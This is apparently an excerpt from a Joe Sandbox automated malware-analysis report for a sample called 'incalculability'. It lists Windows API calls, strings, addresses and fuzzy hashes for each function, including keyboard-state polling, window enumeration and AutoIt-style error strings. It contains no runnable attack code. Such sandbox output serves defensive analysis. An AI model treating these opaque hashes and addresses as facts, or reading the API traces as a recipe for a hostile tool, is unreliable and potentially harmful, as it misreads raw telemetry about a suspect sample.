                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$Directory$CurrentSystem
                            • String ID: D
                            • API String ID: 1914653954-2746444292
                            • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                            • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                            APIs
                            • _wcsncpy.LIBCMT ref: 0045CE39
                            • __wsplitpath.LIBCMT ref: 0045CE78
                            • _wcscat.LIBCMT ref: 0045CE8B
                            • _wcscat.LIBCMT ref: 0045CE9E
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                            • _wcscpy.LIBCMT ref: 0045CF61
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                            • String ID: *.*
                            • API String ID: 1153243558-438819550
                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll
                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                            • API String ID: 3832890014-4202584635
                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                            APIs
                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                            • GetFocus.USER32 ref: 0046A0DD
                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessagePost$CtrlFocus
                            • String ID: 0
                            • API String ID: 1534620443-4108050209
                            • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                            • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                            APIs
                            • DestroyWindow.USER32(?), ref: 004558E3
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                            Strings
                            Similarity
                            • API ID: Window$CreateDestroy
                            • String ID: ,$tooltips_class32
                            • API String ID: 1109047481-3856767331
                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                            APIs
                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                            • GetMenuItemCount.USER32(?), ref: 00468C45
                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                            • GetMenuItemCount.USER32 ref: 00468CFD
                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                            • GetCursorPos.USER32(?), ref: 00468D3F
                            • SetForegroundWindow.USER32(?), ref: 00468D49
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                            Strings
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                            • String ID: 0
                            • API String ID: 1441871840-4108050209
                            • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                            • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                            • __swprintf.LIBCMT ref: 00460915
                            • __swprintf.LIBCMT ref: 0046092D
                            • _wprintf.LIBCMT ref: 004609E1
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                            Strings
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 3631882475-2268648507
                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                            APIs
                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                            • SendMessageW.USER32 ref: 00471740
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                            • SendMessageW.USER32 ref: 0047184F
                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                            Similarity
                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                            • String ID:
                            • API String ID: 4116747274-0
                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                            • _wcslen.LIBCMT ref: 00461683
                            • __swprintf.LIBCMT ref: 00461721
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                            • GetDlgCtrlID.USER32(?), ref: 00461869
                            • GetWindowRect.USER32(?,?), ref: 004618A4
                            • GetParent.USER32(?), ref: 004618C3
                            • ScreenToClient.USER32(00000000), ref: 004618CA
                            • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                            Strings
                            Similarity
                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                            • String ID: %s%u
                            • API String ID: 1899580136-679674701
                            • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                            • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                            • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                            • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                            APIs
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                            Strings
                            Similarity
                            • API ID: InfoItemMenu$Sleep
                            • String ID: 0
                            • API String ID: 1196289194-4108050209
                            • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                            • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                            APIs
                            • GetDC.USER32(00000000), ref: 0043143E
                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                            • SelectObject.GDI32(00000000,?), ref: 00431466
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                            Strings
                            Similarity
                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                            • String ID: (
                            • API String ID: 3300687185-3887548279
                            • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                            • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                            APIs
                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            Strings
                            Similarity
                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 1976180769-4113822522
                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                            APIs
                            Similarity
                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                            • String ID:
                            • API String ID: 461458858-0
                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                            • DeleteObject.GDI32(?), ref: 004301D0
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                            Similarity
                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3969911579-0
                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                            APIs
                            Strings
                            Similarity
                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                            • String ID: 0
                            • API String ID: 956284711-4108050209
                            APIs
                            Strings
                            Similarity
                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 1965227024-3771769585
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                            Strings
                            Similarity
                            • API ID: SendString$_memmove_wcslen
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 369157077-1007645807
                            APIs
                            • GetParent.USER32 ref: 00445BF8
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                            • __wcsicoll.LIBCMT ref: 00445C33
                            • __wcsicoll.LIBCMT ref: 00445C4F
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                            Strings
                            Similarity
                            • API ID: __wcsicoll$ClassMessageNameParentSend
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 3125838495-3381328864
                            APIs
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                            Similarity
                            • API ID: MessageSend$CharNext
                            • String ID:
                            • API String ID: 1350042424-0
                            APIs
                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                            • _wcscpy.LIBCMT ref: 004787E5
                            Strings
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 3052893215-2127371420
                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                            • __swprintf.LIBCMT ref: 0045E7F7
                            • _wprintf.LIBCMT ref: 0045E8B3
                            • _wprintf.LIBCMT ref: 0045E8D7
                            Strings
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-2354261254
                            APIs
                            Strings
                            Similarity
                            • API ID: __swprintf_wcscpy$__i64tow__itow
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 3038501623-2263619337
                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                            • __swprintf.LIBCMT ref: 0045E5F6
                            • _wprintf.LIBCMT ref: 0045E6A3
                            • _wprintf.LIBCMT ref: 0045E6C7
                            Strings
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-8599901
                            APIs
                            • timeGetTime.WINMM ref: 00443B67
                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                            • SetActiveWindow.USER32(00000000), ref: 00443BEC
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                            • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                            • IsWindow.USER32(00000000), ref: 00443C3A
                            • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                            Strings
                            Similarity
                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                            • String ID: BUTTON
                            • API String ID: 1834419854-3405671355
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                            • LoadStringW.USER32(00000000), ref: 00454040
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • _wprintf.LIBCMT ref: 00454074
                            • __swprintf.LIBCMT ref: 004540A3
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                            Strings
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 455036304-4153970271
                            APIs
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                            • _memmove.LIBCMT ref: 00467EB8
                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                            • _memmove.LIBCMT ref: 00467F6C
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                            Similarity
                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                            • String ID:
                            • API String ID: 2170234536-0
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00453CE0
                            • SetKeyboardState.USER32(?), ref: 00453D3B
                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                            • GetKeyState.USER32(000000A0), ref: 00453D75
                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                            • GetKeyState.USER32(00000011), ref: 00453DEF
                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                            • GetKeyState.USER32(00000012), ref: 00453E26
                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
